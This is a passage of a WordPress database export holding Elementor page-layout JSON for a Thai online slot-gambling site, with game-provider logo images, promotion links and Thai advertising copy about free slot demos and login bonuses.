0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1393,170,'_thumbnail_id','61'),(1397,171,'_elementor_edit_mode','builder'),(1398,171,'_elementor_template_type','wp-page'),(1399,171,'_elementor_version','3.32.5'),(1400,171,'_elementor_pro_version','3.32.3'),(1401,171,'_wp_page_template','default'),(1402,171,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1403,171,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/megabetauto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"button_text_color\":\"#FFFFFF\",\"hover_color\":\"#E6C300\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"hover_color\":\"#E9C500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1404,171,'_thumbnail_id','61'),(1423,173,'_thumbnail_id','60'),(1424,173,'_elementor_edit_mode','builder'),(1425,173,'_elementor_template_type','wp-page'),(1426,173,'_elementor_version','3.32.5'),(1427,173,'_elementor_pro_version','3.32.3'),(1428,173,'_wp_page_template','default'),(1429,173,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1430,173,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 